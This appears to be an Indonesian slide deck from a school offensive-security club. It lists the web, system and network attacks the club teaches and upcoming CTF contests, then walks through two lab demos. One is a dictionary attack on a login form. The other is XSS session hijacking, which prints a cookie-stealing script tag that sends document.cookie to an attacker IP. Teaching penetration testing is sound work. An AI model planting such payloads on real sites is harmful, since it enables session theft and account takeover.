OFFENSIVE SECURITYCreated by Aurum Radiance

CYBER SECURITY Seiring perkembangannya teknologi, maka berbagai masalah

datang, antara lain adalah keamanan siber, dengan pesatnya jumlah pengguna komputer, dan sangat dikit yang menyadari seberapa pentingnya keamanan siber, maka dibuatnya komunitas Offensive Security of Smansaka (Offsecos).

“Best defense is a good offense” –jack dempsy, maka dari itu, Offescos berisi tentang Hacking dalam rangka menemukan kelemahan dari sebuah sistem/jaringan (penetration testing).

Selain itu peserta akan berdiskusi tentang Computer Forensic, Security Assesment.

DALAM KOMUNITAS INI AKAN DIAJARKAN

Penyerangan terhadap website XSS LFI RFI LDAP Injection SSI Injection SQL Injection FTP Bounce Attack Symlinking CSRF Dictionary Attack

Penyerangan terhadap system Buffer Overflow Remote Code Execution Privilege Escalating Backdoor Viruses and Worm

Penyerangan terhadap network Cracking WEP Cracking WPA2 Cracking WPS ARP Spoofing DNS Spoofing Port Stealing Traffic Tunneling

PERLOMBAANNO

Nama Perlombaan Waktu Biaya Lokasi Hadiah

1 CDC Kemhan ~10 Nov Free “UNKNOWN” “UNKNOWN”2 Agrihack ~20-21 Nov 50k IPB 3,5 JT + Trophy +

Sertifikat3 IDSECCONF ~26 Nov 25K Yogyakarta Pembicara (API), +1 jt

rupiah4 CTF : HACK THE

DRAGON~8 Feb Free Online “UNKNOWN”

5 Compfest CTF ~21 Nov ?? ~Balairung UI 7 JT + Biznet Cloud 7 JT6 Cyber Jawara ~25 Nov Free Bali 20 JT + ikut Cyber Sea

Games

MODULE Pengajaran akan berbasis Teori-Praktek. Setiap peserta akan menginstall Pentest OS (Backbox, Kali Sana,

Backtrack, dll) Setiap melakukan aktivitas hacking dan hanya untuk aktivitas

hacking, peserta di haruskan untuk membuat Lab Report. Pada awal waktu peserta akan diajarkan dasar pengunaan Linux,

alat hacking yang digunakan, dan sedikit gambaran ketika sedang melakukan penetration testing.

KEPERLUAN Memiliki Network Interface Card yang support monitor mode. Mempunyai storage yang cukup untuk menginstall Penetration

Distro. Mempunyai Spec yang memadai untuk menginstall Pentest Lab. Memiliki kemauan untuk berusaha lebih keras

SCENARIO HACKING 1Dictionary Attack pada website

HACKING SCENARIO 1 Dictionary Attack adalah penyerangan dimana penyerang

mencoba sebuah list password untuk menguji 1 per 1 mana yang benar.

Dictionary Attack sering kali disalah artikan sebagai brute force attack, dimana perbedaannya adalah dictionary attack sumber password berasal dari sebuah list, sedangkan brute force attack, password merupakan semua kombinasi memungkinan dari charset yang sudah ditentukan.

HACKING SCENARIO 1 Karena kita ingin menggunakan sebuah alat, agar dapat

memasukan sandi jauh lebih cepat (rata rata 500-4000 sandi /detik). Kita perlu mengetahui output bila salah

Dan juga kita perlu mengetahui bagaimana input yang dapat dimasuki (karena website saya mudah, saya dapat memasukannya dari URL)

HACKING SCENARIO 1 Pada formulir terdapat 2 cara yaitu HTTP Post, dan HTTP Get,

untuk itu kita perlu liat source codenya agar kita dapat menentukan tipe apa ini (pada kasus saya yaitu get)

Cookie; karena ini lab, maka ada suatu hambatan yaitu cookie, karena sebelum saya dapat membuka lab ini saya harus login disebelumnya, bila saya menggunakan tools lain maka tools itu akan gagal karena tidak memiliki akses terhadap halaman yang akan diserang, oleh karena itu saya harus menginput cookie juga

HACKING SCENARIO 1 Maka info sudah cukup saya akan melaksanakan penyerangan Pada demo ini saya menggunakan wordlist yang hanya berisi 3

saja, namun pada kali sana sudah terdapat wordlist yang berisi ribuan password

SCENARIO HACKING 2Session Hijacking /w XSS pada website

SCENARIO HACKING 2 XSS atau Cross Site Scripting, ialah penyerangan pada sebuah

Form, dimana user input tidak di sanitize. Session Hijacking ialah sebuah nama penyerangan dimana

penyerang dapat mengambil suatu sesi dari korban (bisa berupa sesi browser)

Hal yang pertama diperlukan ialahmencari tau IP Address kita

SCENARIO HACKING 2 Saya telah menemukan sebuah form maka saya akan memasukan

script saya untuk mencuri cookie <Script>new image().src="http://192.168.1.103/pizza.php?

”+document.cookie;</script> Ketika seseorang menjalankan script browser tersebut akan meminta

gambar (gak ada gambarnya tapi) yang berada di sana, kemudian akan meminta cookie pada page yang tersedia tersebut

SCENARIO HACKING 2 Kemudian anda perlu mengsetup listener (yang akan membaca seluruh

traffic pada port tertentu)

Kemudian ketika korban membuka page yang adascript kita, maka akan didapatkan ini

Korban penyerang

SCENARIO HACKING 2 Dengan cookie tersebut saya akan memodifikasi browser saya

agar menggunakan cookie tersebut, saya menggunakan ekstensi cookie inspector pada chrome

Kemudian ketika saya refresh page, maka saya akan login sebagai korban saya

KONKLUSI Walau perkembangan keamanan siber telah meningkat bertahun

tahun, penyerangan masih saja dapat terjadi, hal ini disebabkan oleh kekurangannya pengetahuan user, ataupun admin tentang keamanan siber.

Walau terdapat orang yang mengetahuinya, masih saja dapat terjadi Miss-Configured Service dan juga Code sehingga melakukan penetration testing merupakan hal yang penting.